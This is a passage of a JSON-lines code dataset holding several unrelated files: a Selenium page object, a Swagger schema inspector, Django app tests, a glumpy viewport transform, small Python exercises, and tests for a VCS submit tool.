---\".format(purchase_unit_price))\n self.find_element(loc.purchase_unit_price_loc).send_keys(purchase_unit_price)\n\n # 输入采购数量\n def input_purchase_amount(self, purchase_amount):\n logger.info(\"--- 输入采购数量:{} ---\".format(purchase_amount))\n self.find_element(loc.purchase_amount_loc).send_keys(purchase_amount)\n\n # 输入结算周期\n def input_settle_cycle(self, settle_cycle):\n logger.info(\"--- 输入结算周期:{} ---\".format(settle_cycle))\n self.find_element(loc.settle_cycle_loc).send_keys(settle_cycle)\n\n # 输入采购开始时间\n def input_begin_time(self, begin_time):\n logger.info(\"--- 输入采购开始时间 : {} ---\".format(begin_time))\n self.find_element(loc.begin_time_loc).clear()\n self.find_element(loc.begin_time_loc).send_keys(begin_time)\n\n # 输入才否截止时间\n def input_end_time(self, end_time):\n logger.info(\"--- 输入采购截止时间 : {} ---\".format(end_time))\n self.find_element(loc.end_time_loc).clear()\n self.find_element(loc.end_time_loc).send_keys(end_time)\n\n # 设置对供货商可见\n def select_supply_user_yes(self):\n logger.info(\"--- 设置对供货商可见 ---\")\n self.find_element(loc.supply_user_yes).click()\n\n # 输入说明\n def input_desc(self, desc):\n logger.info(\"--- 输入说明:{} ---\".format(desc))\n self.find_element(loc.desc_loc).send_keys(desc)\n\n # 选择采购经理人\n def select_linker(self, linker_name):\n logger.info(\"--- 选择采购经理人:{} ---\".format(linker_name))\n # 点击选择按钮\n self.find_element(loc.linker_loc).click()\n # 获取所有采购经理人的名字\n names = self.find_elements(loc.linker_name_loc)\n try:\n # 判断想选择的采购经理人是否在列表中,存在时点击选择\n for i in names:\n if i.text == linker_name:\n i.click()\n break\n\n logger.info(\"--- 选择采购经理人后,点击确定 ---\")\n self.find_element(loc.select_linker_yes_loc).click()\n try:\n # 判断是否有错误信息提示框\n self.wait_ele_visible(loc.linker_msg_loc, visible=None)\n except:\n logger.exception(\"--- 提示信息:请选择采购经理人 ---\")\n raise\n else:\n logger.info(\"--- 选择采购经理人成功 ---\")\n except:\n logger.info(\"--- 错误信息:选择的采购经理人不存在 ---\")\n\n # 提交订单\n def submit_click(self):\n logger.info(\"--- 点击提交订单 ---\")\n self.find_element(loc.submit_loc).click()\n logger.info(\"--- 提交订单成功 ---\")\n\n def create_order(self, kind, manu_name, address, size, sale_unit_price, purchase_unit_price, purchase_amount\n , settle_cycle, begin_time, end_time, linker_name, desc):\n \"\"\"\n 创建订单整体流程\n :param kind: 类别\n :param manu_name: 生产企业名称\n :param address: 详细地址\n :param size: 规格描述\n :param sale_unit_price: 销售单价\n :param purchase_unit_price: 采购单价\n :param purchase_amount: 采购数量\n :param settle_cycle: 结算周期\n :param begin_time: 开始时间\n :param end_time: 截止时间\n :param linker_name: 采购经理人\n :param desc: 说明\n \"\"\"\n # 选择定价\n self.select_kind(kind)\n # 选择生产企业\n self.select_manu(manu_name)\n # 没有详细地址时输入\n self.input_address(address)\n # 选择品名(选了一个固定的)\n self.select_product()\n # 输入规格\n self.input_size(size)\n # 输入销售单价\n self.input_sale_unit_price(sale_unit_price)\n # 输入预采单价\n self.input_purchase_unit_price(purchase_unit_price)\n # 输入预采数量\n self.input_purchase_amount(purchase_amount)\n # 输入结算周期\n self.input_settle_cycle(settle_cycle)\n # 输入开始日期和时间\n self.input_begin_time(begin_time)\n # 输入截止时间和日期\n self.input_end_time(end_time)\n # 对供货商可见\n self.select_supply_user_yes()\n # 选择采购经理人\n self.select_linker(linker_name)\n # 输入说明\n self.input_desc(desc)\n # 点击提交\n self.submit_click()","sub_path":"Desktop/GitTest/2021_SQM_Project/B2B_UI_Automate_Code/study_web_unit/pageobject/订单管理/page_创建订单页.py","file_name":"page_创建订单页.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"447370199","text":"import typing\n\nfrom drf_yasg import openapi\nfrom drf_yasg.inspectors import SwaggerAutoSchema as SwaggerAutoSchemaBase\nfrom drf_yasg.utils import merge_params\n\nfrom .generation import build_responses_schemas\nfrom ..drf.input_serializer import InputSerializer\nfrom ..web.request_body_annotation import RequestBodyAnnotation\nfrom ..routing import Route\nfrom ..routing import RouteAnnotation\nfrom ..schema.generation import build_method_parameters\nfrom ..schema.generation import get_schema_title\nfrom ..schema.type_inspection import inspect_type\n\n\nclass SwaggerAutoSchema(SwaggerAutoSchemaBase):\n\n def get_operation(self, operation_keys):\n route = self._get_route()\n if route is None:\n return super().get_operation(operation_keys)\n method = route.method\n consumes = self._get_consumes(route)\n produces = self._get_produces(route)\n\n body = self._get_request_body_parameters(route)\n manual_parameters = build_method_parameters(route)\n parameters = merge_params(body, manual_parameters)\n\n operation_id = method.full_name\n description = method.docstring.short_description\n deprecated = self.is_deprecated()\n responses = self._get_responses(route)\n tags = self.get_tags(operation_keys)\n\n return openapi.Operation(\n operation_id=operation_id,\n description=description,\n responses=responses,\n parameters=parameters,\n consumes=consumes,\n produces=produces,\n deprecated=deprecated,\n tags=tags,\n )\n\n def _get_responses(self, route: Route):\n responses_schemas = build_responses_schemas(route)\n return openapi.Responses(responses=self.get_response_schemas(responses_schemas))\n\n def _get_consumes(self, route: Route):\n route_annotation = route.method.annotations.get_one_or_none(RouteAnnotation)\n if route_annotation is None or route_annotation.consumes is None:\n return self.get_consumes()\n return [str(media_type) for media_type in route_annotation.consumes]\n\n def _get_produces(self, route: Route):\n route_annotation = route.method.annotations.get_one_or_none(RouteAnnotation)\n\n if route_annotation is None or route_annotation.produces is None:\n return self.get_produces()\n return [str(media_type) for media_type in route_annotation.produces]\n\n def _get_request_body_parameters(self, route: Route) -> typing.List[openapi.Parameter]:\n method = route.method\n input_serializer = method.annotations.get_one_or_none(InputSerializer)\n if input_serializer is not None:\n serializer = input_serializer.class_()\n schema = self.get_request_body_schema(serializer)\n return [openapi.Parameter(name='data', in_=openapi.IN_BODY, required=True, schema=schema)]\n request_body_annotation = method.annotations.get_one_or_none(RequestBodyAnnotation)\n\n if request_body_annotation is not None:\n argument = method.get_argument(request_body_annotation.argument_name)\n type_info = inspect_type(argument.type_)\n title = get_schema_title(argument)\n schema = openapi.Schema(title=title, **type_info.as_dict())\n return [openapi.Parameter(name='data', in_=openapi.IN_BODY, required=True, schema=schema)]\n return []\n\n def _get_route(self) -> typing.Optional[Route]:\n view_cls = type(self.view)\n func = getattr(view_cls, self.method.lower(), None)\n return getattr(func, 'route', None)\n","sub_path":"winter/schema/inspectors.py","file_name":"inspectors.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555853975","text":"import logging\n\nfrom src.helper_classes.Exceptions import NotAStringException\nfrom src.validator_classes.StringValidator import StringValidator\n\n\n# klasa pomagajaca wpisywac logi do pliku\nclass Loggable:\n # kontruktor\n def __init__(self):\n Loggable.__logging_module_initiated = False\n\n # inicjuje modul do logowania (jesli nie zainicjowany)\n def _init_logging_module(self):\n if not self.__logging_module_initiated:\n logging.basicConfig(filename=\"program_log.log\",\n filemode='a',\n format='%(asctime)s %(message)s',\n datefmt='%H:%M:%S',\n level=logging.DEBUG)\n self.__logging_module_initiated = True\n\n # wrzuca podanego stringa to loga\n def _log(self, value_to_log):\n if self.__is_string(value_to_log) and self.__logging_module_initiated:\n logging.info(value_to_log)\n\n # sprawdza czy podana zmienna jest stringiem\n def __is_string(self, value_to_check):\n validator = StringValidator()\n\n try:\n validator.validate(value_to_check)\n except NotAStringException:\n if not self.__logging_module_initiated:\n self._init_logging_module()\n\n self._log(\"Value passed to log is not a string\")\n return False\n\n return True\n","sub_path":"Lab_2/src/helper_classes/Loggable.py","file_name":"Loggable.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"509969195","text":"# Myself 1ºTime\ndef sum_poly(sum_list):\n new_list = [0 for i in range(len(sum_list[-1]))]\n for i in range(len(sum_list)):\n for j in range(len(sum_list[i])):\n new_list[j] += sum_list[i][j]\n return new_list[::-1]\n\n\ndef multiply_poli(coef_1, coef_2):\n partial_sums_list = []\n aux = []\n if len(coef_1) < len(coef_2):\n coef_1, coef_2 = coef_2, coef_1\n for i in range(len(coef_2)):\n for j in range(len(coef_1)):\n aux.append(coef_1[-(j + 1)] * coef_2[-(i + 1)])\n partial_sums_list.append(aux)\n aux = [0 for i in range(i + 1)]\n return sum_poly(partial_sums_list)\n\n# Duarte\ndef multiply_2(coef_1, coef_2):\n dict = {}\n if len(coef_1) < len(coef_2):\n coef_1, coef_2 = coef_2, coef_1\n coef_1, coef_2 = coef_1[::-1], coef_2[::-1]\n for index1, num1 in enumerate(coef_1):\n for index2, num2 in enumerate(coef_2):\n dict[index1 +\n index2] = dict.get(index2 + index1, 0) + (num1 * num2)\n return list(j for i, j in sorted(dict.items(), reverse=True))\n\n\nif __name__ == \"__main__\":\n coef_1 = [1, 2, 3, 4]\n coef_2 = [1, 2, 3]\n print(multiply_poli(coef_1, coef_2))\n","sub_path":"Clube de Programação/Code/Clube_01_3.py","file_name":"Clube_01_3.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"323360561","text":"# -*- coding: utf-8 -*-\n# -----------------------------------------------------------------------------\n# Copyright (c) 2014, Nicolas P. Rougier\n# Distributed under the (new) BSD License. See LICENSE.txt for more info.\n# -----------------------------------------------------------------------------\n\"\"\"\nViewport transform\n\nThe viewport transform allows to restrict the display of a scene to a local\nviewport.\n\nThe transform is connected to the following events:\n\n * attach (initialization)\n * resize (update)\n\nRelevant shader code:\n\n * transforms/viewport.glsl\n\n\"\"\"\nfrom glumpy import library\nfrom . transform import Transform\n\n\nclass Viewport(Transform):\n \"\"\"\n The clipping transform allows to restrict the display of a scene to a local\n viewport.\n \"\"\"\n\n aliases = { \"clipping\" : \"viewport_clipping\",\n \"transform\" : \"viewport_transform\",\n \"local\" : \"viewport_local\",\n \"extents\" : \"viewport_local\",\n \"global\" : \"viewport_global\" }\n\n\n def __init__(self, code=None, *args, **kwargs):\n \"\"\"\n Initialize the transform.\n Note that parameters must be passed by name (param=value).\n\n Kwargs parameters\n -----------------\n\n transform : bool (default is False)\n Whether to enforce viewport transformation\n\n clipping : bool (default is False)\n Whether to enforce viewport clipping\n\n viewport : tuple of 4 floats (default is None)\n Viewport (x,y,w,h) in window coordinates\n \"\"\"\n\n if code is None:\n code = library.get(\"transforms/viewport.glsl\")\n\n self._global = 0,0,512,512\n self._local = Transform._get_kwarg(\"viewport\", kwargs) or None\n self._clipping = Transform._get_kwarg(\"clipping\", kwargs) or True\n self._transform = Transform._get_kwarg(\"transform\", kwargs) or True\n\n Transform.__init__(self, code, *args, **kwargs)\n\n\n\n @property\n def extents(self):\n \"\"\" Viewport extents as (x,y,w,h) (abosute coordinates) \"\"\"\n\n return self._local\n\n\n @extents.setter\n def extents(self, value):\n \"\"\" Viewport extents as (x,y,w,h) (abosute coordinates) \"\"\"\n\n self._local = value\n if self.is_attached:\n if self._local is None:\n self[\"local\"] = self._global\n else:\n self[\"local\"] = self._local\n self[\"clipping\"] = self._clipping\n self[\"transform\"] = self._transform\n\n\n @property\n def clipping(self):\n \"\"\" Whether to enforce viewport clipping \"\"\"\n\n return self._clipping\n\n\n @clipping.setter\n def clipping(self, value):\n \"\"\" Whether to enforce viewport clipping \"\"\"\n\n self._clipping = value\n if self.is_attached:\n self[\"clipping\"] = self._clipping\n\n\n @property\n def transform(self):\n \"\"\" Whether to enforce viewport transform \"\"\"\n\n return self._transform\n\n\n @transform.setter\n def transform(self, value):\n \"\"\" Whether to enforce viewport transform \"\"\"\n\n self._transform = value\n if self.is_attached:\n self[\"transform\"] = self._transform\n\n\n\n def on_attach(self, program):\n \"\"\" Initialization \"\"\"\n\n self[\"global\"] = self._global\n if self._local is None:\n self[\"local\"] = self._global\n else:\n self[\"local\"] = self._local\n self[\"clipping\"] = self._clipping\n self[\"transform\"] = self._transform\n\n\n def on_resize(self, width, height):\n \"\"\" Update \"\"\"\n\n self._global = 0, 0, width, height\n self[\"global\"] = self._global\n if self._local is None:\n self[\"local\"] = self._global\n\n # Transmit signal to other transforms\n Transform.on_resize(self, width, height)\n","sub_path":"glumpy/transforms/viewport.py","file_name":"viewport.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"532016783","text":"from django.test import TestCase\nfrom prac.models import Item, pendingname\n\nclass TestHomePage(TestCase):\n\n\tdef test_mainpage_returns_view(self):\n\t\tresponse = self.client.get('/')\n\t\tself.assertTemplateUsed(response, 'psrform.html')\n\nclass ORMTest(TestCase):\n\tdef test_save_retrive_list(self):\n\t\tnewName = pendingname()\n\t\t# newName.fname = 'Name one' #####\n\t\t# newName.faddress = 'Address two' #####\n\t\tnewName.save()\n\t\ttxtItem1 = Item()\n\t\ttxtItem1.text = 'Item one'\n\t\ttxtItem1.pname = newName\n\t\ttxtItem1.address = 'address one'\n\t\ttxtItem1.save()\n\t\ttxtItem2 = Item()\n\t\ttxtItem2.pname = newName\n\t\ttxtItem2.text = 'Item two'\n\t\ttxtItem2.address = 'address two'\n\t\ttxtItem2.save()\n\t\tsavedItems = Item.objects.all()\n\t\tsavedFirstdata = pendingname.objects.all()\n\t\tsavedpendingname = pendingname.objects.first()\n\t\tself.assertEqual(savedItems.count(), 2)\n\t\tself.assertEqual(savedpendingname, newName)\n\t\tsavedItem1 = savedItems[0]\n\t\tsavedItem2 = savedItems[1]\n\t\tself.assertEqual(savedItem1.text, 'Item one')\n\t\tself.assertEqual(savedItem2.text, 'Item two')\n\t\tself.assertEqual(savedItem1.pname, newName)\n\t\tself.assertEqual(savedItem2.pname, newName)\n\t\tself.assertEqual(savedItem1.address, 'address one')\n\t\tself.assertEqual(savedItem2.address, 'address two')\n\t\n\t\n\nclass ViewingTest(TestCase):\n\tdef test_displays_for_each_pendingname(self):\n\t\tnewName = pendingname.objects.create()\n\t\taddress = pendingname.objects.create() #ITO\n\t\tItem.objects.create(pname=newName, text='Liza') #palitan mamaya ang text dito at sa taas\n\t\tItem.objects.create(pname=newName, text='Gil')\n\t\tresponse = self.client.get(f'/prac/{newName.id}/')\n\t\tself.assertContains(response, 'Liza')\n\t\tself.assertContains(response, 'Gil')\n\n\t\tnewName_2 = pendingname.objects.create()\n\t\tItem.objects.create(pname=newName_2, text='Bernardo') #palitan mamaya ang text dito at sa taas\n\t\tItem.objects.create(pname=newName_2, text='Padilla')\n\t\tresponse = self.client.get(f'/prac/{newName_2.id}/')\n\t\tself.assertNotContains(response, 'Liza')\n\t\tself.assertNotContains(response, 'Gil')\n\n\n\tdef test_listviewing_uses_listpage(self):\n\t\tnewName = pendingname.objects.create()\n\t\tresponse = self.client.get(f'/prac/{newName.id}/')\n\t\tself.assertTemplateUsed(response, 'psrlist.html') #ITO PINALITAN KO HTML\n \n\tdef test_pass_list_temp(self):\n\t\tsubsidy1 = pendingname.objects.create()\n\t\tsubsidy2 = pendingname.objects.create()\n\t\tpassinglistahan = pendingname.objects.create()\n\t\tresponse = self.client.get(f'/prac/{passinglistahan.id}/')\n\t\tself.assertEqual(response.context['pn'], passinglistahan) #pasahan ng data\n\n\nclass creatingnewlisttest(TestCase):\n\t\n\tdef test_for_POST_request_to_save(self):\n\t\tresponse = self.client.post('/prac/newlist_url', data={\"surname\" : ['sname', 'fname' ],\"address\" : 'address', })\n\t\tself.assertEqual(Item.objects.count(), 1) #^^wala talaga siyang / ha ghoourl\n\t\tnewIt = Item.objects.first()\n\t\t# self.assertEqual(newIt.text, 'sname')\n\t\t# self.assertEqual(newIt.address, 'address')\n\n\tdef test_POST_redirect_go_roli(self):\n\t\tresponse = self.client.post('/prac/newlist_url',data={'surname': ['sname', 'fname'] ,'address': 'address'})\n\t\tnewName = pendingname.objects.first()\n\t\tself.assertRedirects(response, f'/prac/{newName.id}/') \n\nclass addingofitem(TestCase):\n\tdef test_add_POST_existing_list_request(self):\n\t\tayuDa1 = pendingname.objects.create()\n\t\tayuDa2 = pendingname.objects.create()\n\t\texistlist = pendingname.objects.create()\n\t\tself.client.post(f'/prac/{existlist.id}/addItem',data={'surname': 'New Item for existing list', 'address' : 'New address for existing list'})\n\t\tself.assertEqual(Item.objects.count(), 1)\n\t\tnewIt = Item.objects.first()\n\t\tself.assertEqual(newIt.text, 'New Item for existing list')\n\t\tself.assertEqual(newIt.address, 'New address for existing list')\n\t\tself.assertEqual(newIt.pname, existlist)\n\n\n\tdef test_redirects_listview(self):\n\t\tayuda1 = pendingname.objects.create()\n\t\tayuda2 = pendingname.objects.create()\n\t\tayuda3 = pendingname.objects.create()\n\t\texistlist = pendingname.objects.create()\n\t\tresponse = self.client.post(f'/prac/{existlist.id}/addItem',data={'surname': 'New Item for existing list','address' : 'New address for existing list'})\n\t\tself.assertRedirects(response, f'/prac/{existlist.id}/')\n\n\n\n#from django.urls import resolve\n#from psr.views import MainPage\n#from django.http import HttpRequest\n#from django.template.loader import render_to_string\n\n\n\t\t# def test_save_necessary_items(self):\n\t\t# \tself.client.get('/')\n\t\t# \tself.assertEqual(Item.objects.count(), 0)\n\n\t\t# def test_displaying_template_list(self):\n\t\t# \tItem.objects.create(text='List item 1')\n\t\t# \tItem.objects.create(text='List item 2')\n\t\t# \tresponse = self.client.get('/')\n\t\t# \tself.assertIn('List item 1', response.content.decode())\n\t\t# \tself.assertIn('List item 2', response.content.decode())\n\n\t\t\n\n\t\t# self.assertEqual(response.status_code, 302)\n\t\t# self.assertEqual(response['location'], '/psr/viewlist_url/')\n\n\n\n\n\n\n#PREVIOUS CODE FOR REFERENCE\n\n\t#self.assertIn('sname', response.content.decode())\n\t\t#self.assertIn('gname', response.content.decode())\n\t\t#self.assertTemplateUsed(response, 'psrform.html')\n\n\n# 'middlename' : 'mname', 'age' : 'age', 'sex' : 'sex',\n\t\t# 'adress' : 'address'})\n\"\"\"\t\n\tdef test_if_root_resolves_mainpage(self):\n\t\tfound = resolve ('/')\n\t\tself.assertEqual(found.func, MainPage)\n\n\tdef tes_mainpage_returns_view(self):\n\t\tresponse = self.client('/')\n\t\thtml = response.content.decode('utf8')\n\t\tmain_html = render_to_string('psrform.html')\n\t\tself.assertEqual(html, main_html)\n\t\tself.assertTemplateUsed(response, 'psrform.html')\n\n\tdef test_mainpage_returns_view(self):\n\t\trequest = HttpRequest()\n\t\tresponse = MainPage(request)\n\t\thtml = response.content.decode('utf8')\n\t\tstring_html = render_to_string('psrform.html')\n\t\tself.assertEqual(html, string_html)\n\n\tdef test_mainpage_view(self):\n\t\trequest = HttpRequest()\n\t\tresponse = MainPage(request)\n\t\thtml = response.content.decode('utf8')\n\t\tself.assertTrue(html.startswith(''))\n\t\tself.assertIn('Pandemic Subsidy Registration', html)\n\t\tself.assertTrue(html.endswith(''))\n# Create your tests here. \"\"\"\n","sub_path":"prac/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"58432632","text":"# Simple guess game for checking is the user guess correct ?\n\nclass GuessGame():\n \n def __init__(self,number,minimum=0,maximum = 100):\n \"\"\" This is the constructor of the GuessGame class.\n \n Args:\n number (int): number to guess\n minimum (int, optional): . Defaults to 0.\n maximum (int, optional): . Defaults to 100.\n \"\"\"\n self.number = number\n self.guesses = 0\n self.minimum = minimum\n self.maximum = maximum\n \n def get_guess(self):\n \"\"\"This function will get the gessed number from the user\n\n Returns:\n (int): user guessed number(valid)\n \"\"\"\n while True:\n try:\n guessed = int(input(f'Enter a value between {self.minimum}-{self.maximum} : '))\n if self.minimum <= guessed >= self.maximum :\n print(f'Please,enter a value between {self.minimum}-{self.maximum}')\n continue\n return guessed\n except :\n print('Please enter a number')\n continue\n \n def play_game(self):\n \"\"\" This is the main function to paly the guess game.\n \"\"\"\n while True:\n self.guesses +=1 \n guess = self.get_guess()\n if guess == self.number :\n print(f'Wow! your are guessed the number {self.number} at {self.guesses} guesses !')\n break\n elif guess < self.number :\n print('your are under the guess')\n else :\n print('your are over the guess')\n\n# Creating a instance of the GuessGame class and calling play gane function to play the guess game.\nGuessGame(12).play_game()\n \n","sub_path":"guess_game.py","file_name":"guess_game.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"563276218","text":"# pylint: disable = redefined-outer-name\n\nimport copy\nimport os\nimport shutil\nimport pytest\n\nfrom universum import __main__\nfrom . import git_utils, perforce_utils, utils\n\n\ndef test_error_no_repo(submit_environment, stdout_checker):\n settings = copy.deepcopy(submit_environment.settings)\n if settings.Vcs.type == \"git\":\n settings.ProjectDirectory.project_root = \"non_existing_repo\"\n __main__.run(settings)\n stdout_checker.assert_has_calls_with_param(\"No such directory\")\n else:\n settings.PerforceSubmitVcs.client = \"non_existing_client\"\n __main__.run(settings)\n stdout_checker.assert_has_calls_with_param(\"Workspace 'non_existing_client' doesn't exist!\")\n\n\n@pytest.fixture()\ndef p4_submit_environment(perforce_workspace, tmpdir):\n yield perforce_utils.P4Environment(perforce_workspace, tmpdir, test_type=\"submit\")\n\n\n@pytest.mark.parametrize(\"branch\", [\"write-protected\", \"trigger-protected\"])\ndef test_p4_error_forbidden_branch(p4_submit_environment, branch):\n protected_dir = p4_submit_environment.vcs_cooking_dir.mkdir(branch)\n file_to_add = protected_dir.join(utils.randomize_name(\"new_file\") + \".txt\")\n text = \"This is a new line in the file\"\n file_to_add.write(text + \"\\n\")\n\n settings = copy.deepcopy(p4_submit_environment.settings)\n setattr(settings.Submit, \"reconcile_list\", str(file_to_add))\n\n assert __main__.run(settings)\n\n p4 = p4_submit_environment.p4\n # make sure submitter didn't leave any pending CLs in the workspace\n assert not p4.run_changes(\"-c\", p4_submit_environment.client_name, \"-s\", \"pending\")\n # make sure submitter didn't leave any pending changes in default CL\n assert not p4.run_opened(\"-C\", p4_submit_environment.client_name)\n\n\ndef test_p4_success_files_in_default(p4_submit_environment):\n # This file should not be submitted, it should remain unchanged in default CL\n p4 = p4_submit_environment.p4\n p4_file = p4_submit_environment.repo_file\n p4.run_edit(str(p4_file))\n text = \"This text should be in file\"\n p4_file.write(text + \"\\n\")\n\n # This file should be successfully submitted\n file_name = utils.randomize_name(\"new_file\") + \".txt\"\n new_file = p4_submit_environment.vcs_cooking_dir.join(file_name)\n new_file.write(\"This is a new file\" + \"\\n\")\n\n settings = copy.deepcopy(p4_submit_environment.settings)\n setattr(settings.Submit, \"reconcile_list\", str(new_file))\n\n assert not __main__.run(settings)\n assert text in p4_file.read()\n\n\ndef test_p4_error_files_in_default_and_reverted(p4_submit_environment):\n # This file should not be submitted, it should remain unchanged in default CL\n p4 = p4_submit_environment.p4\n p4_file = p4_submit_environment.repo_file\n p4.run_edit(str(p4_file))\n text_default = \"This text should be in file\"\n p4_file.write(text_default + \"\\n\")\n\n # This file must fail submit and remain unchanged while not checked out any more\n protected_dir = p4_submit_environment.vcs_cooking_dir.mkdir(\"write-protected\")\n new_file = protected_dir.join(utils.randomize_name(\"new_file\") + \".txt\")\n text_new = \"This is a new line in the file\"\n new_file.write(text_new + \"\\n\")\n\n settings = copy.deepcopy(p4_submit_environment.settings)\n setattr(settings.Submit, \"reconcile_list\", str(new_file))\n\n assert __main__.run(settings)\n assert text_default in p4_file.read()\n assert text_new in new_file.read()\n\n\nclass SubmitterParameters:\n def __init__(self, stdout_checker, environment):\n self.stdout_checker = stdout_checker\n self.submit_settings = environment.settings\n self.environment = environment\n\n def submit_path_list(self, path_list, **kwargs):\n settings = copy.deepcopy(self.submit_settings)\n setattr(settings.Submit, \"reconcile_list\", \",\".join(path_list))\n\n if kwargs:\n for key, value in kwargs.items():\n setattr(settings.Submit, key, value)\n\n return __main__.run(settings)\n\n def assert_submit_success(self, path_list, **kwargs):\n result = self.submit_path_list(path_list, **kwargs)\n assert result == 0\n\n last_cl = self.environment.get_last_change()\n self.stdout_checker.assert_has_calls_with_param(\"==> Change \" + last_cl + \" submitted\")\n\n def file_present(self, file_path):\n return self.environment.file_present(file_path)\n\n def text_in_file(self, text, file_path):\n return self.environment.text_in_file(text, file_path)\n\n\n@pytest.fixture()\ndef submit_parameters(stdout_checker):\n def inner(environment):\n return SubmitterParameters(stdout_checker, environment)\n yield inner\n\n\n@pytest.fixture(params=[\"git\", \"p4\"])\ndef submit_environment(request, perforce_workspace, git_client, tmpdir):\n if request.param == \"git\":\n yield git_utils.GitEnvironment(git_client, tmpdir, test_type=\"submit\")\n else:\n yield perforce_utils.P4Environment(perforce_workspace, tmpdir, test_type=\"submit\")\n\n\ndef test_success_no_changes(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n assert parameters.submit_path_list([]) == 0\n\n\ndef test_success_commit_add_modify_remove_one_file(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n file_name = utils.randomize_name(\"new_file\") + \".txt\"\n temp_file = parameters.environment.vcs_cooking_dir.join(file_name)\n file_path = str(temp_file)\n\n # Add a file\n temp_file.write(\"This is a new file\" + \"\\n\")\n parameters.assert_submit_success([file_path])\n assert parameters.file_present(file_path)\n\n # Modify a file\n text = \"This is a new line in the file\"\n temp_file.write(text + \"\\n\")\n parameters.assert_submit_success([file_path])\n assert parameters.text_in_file(text, file_path)\n\n # Delete a file\n temp_file.remove()\n parameters.assert_submit_success([file_path])\n assert not parameters.file_present(file_path)\n\n\ndef test_success_ignore_new_and_deleted_while_edit_only(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n new_file_name = utils.randomize_name(\"new_file\") + \".txt\"\n temp_file = parameters.environment.vcs_cooking_dir.join(new_file_name)\n temp_file.write(\"This is a new temp file\" + \"\\n\")\n deleted_file_path = str(parameters.environment.repo_file)\n deleted_file_name = os.path.basename(deleted_file_path)\n os.remove(deleted_file_path)\n\n result = parameters.submit_path_list([str(temp_file), deleted_file_path], edit_only=True)\n assert result == 0\n\n parameters.stdout_checker.assert_has_calls_with_param(f\"Skipping '{new_file_name}'\")\n parameters.stdout_checker.assert_has_calls_with_param(f\"Skipping '{deleted_file_name}'\")\n parameters.stdout_checker.assert_has_calls_with_param(\"Nothing to submit\")\n assert parameters.file_present(deleted_file_path)\n assert not parameters.file_present(str(temp_file))\n\n\ndef test_success_commit_modified_while_edit_only(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n target_file = parameters.environment.repo_file\n text = utils.randomize_name(\"This is change \")\n target_file.write(text + \"\\n\")\n\n parameters.assert_submit_success([str(target_file)], edit_only=True)\n assert parameters.text_in_file(text, str(target_file))\n\n\ndef test_error_review(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n target_file = parameters.environment.repo_file\n target_file.write(\"This is some change\")\n\n result = parameters.submit_path_list([str(target_file)], review=True)\n assert result != 0\n parameters.stdout_checker.assert_has_calls_with_param(\"not supported\")\n\n\ndef test_success_reconcile_directory(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n dir_name = utils.randomize_name(\"new_directory\")\n\n # Create and reconcile new directory\n tmp_dir = parameters.environment.vcs_cooking_dir.mkdir(dir_name)\n for i in range(0, 9):\n tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(\"This is some file\" + \"\\n\")\n\n parameters.assert_submit_success([str(tmp_dir) + \"/\"])\n\n for i in range(0, 9):\n file_path = tmp_dir.join(f\"new_file{i}.txt\")\n assert parameters.file_present(str(file_path))\n\n # Create and reconcile a directory in a directory\n another_dir = tmp_dir.mkdir(\"another_directory\")\n tmp_file = another_dir.join(\"new_file.txt\")\n tmp_file.write(\"This is some file\" + \"\\n\")\n\n parameters.assert_submit_success([str(tmp_dir) + \"/\"])\n assert parameters.file_present(str(tmp_file))\n\n # Modify some vcs\n text = utils.randomize_name(\"This is change \")\n for i in range(0, 9, 2):\n tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n\n parameters.assert_submit_success([str(tmp_dir) + \"/\"], edit_only=True)\n\n for i in range(0, 9, 2):\n file_path = tmp_dir.join(f\"/new_file{i}.txt\")\n assert parameters.text_in_file(text, str(file_path))\n\n # Delete a directory\n shutil.rmtree(tmp_dir)\n parameters.assert_submit_success([str(tmp_dir)])\n assert not parameters.file_present(str(tmp_dir))\n\n\ndef test_success_reconcile_wildcard(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n dir_name = utils.randomize_name(\"new_directory\")\n\n # Create embedded directories, partially reconcile\n tmp_dir = parameters.environment.vcs_cooking_dir.mkdir(dir_name)\n inner_dir = tmp_dir.mkdir(\"inner_directory\")\n text = \"This is some file\" + \"\\n\"\n for i in range(0, 9):\n tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text)\n tmp_file = tmp_dir.join(f\"another_file{i}.txt\")\n tmp_file.write(text)\n tmp_file = inner_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text)\n\n parameters.assert_submit_success([str(tmp_dir) + \"/new_file*.txt\"])\n\n for i in range(0, 9):\n file_name = f\"new_file{i}.txt\"\n file_path = tmp_dir.join(file_name)\n assert parameters.file_present(str(file_path))\n file_path = inner_dir.join(file_name)\n assert not parameters.file_present(str(file_path))\n file_name = f\"another_file{i}.txt\"\n file_path = tmp_dir.join(file_name)\n assert not parameters.file_present(str(file_path))\n\n # Create one more directory\n other_dir_name = utils.randomize_name(\"new_directory\")\n other_tmp_dir = parameters.environment.vcs_cooking_dir.mkdir(other_dir_name)\n for i in range(0, 9):\n tmp_file = 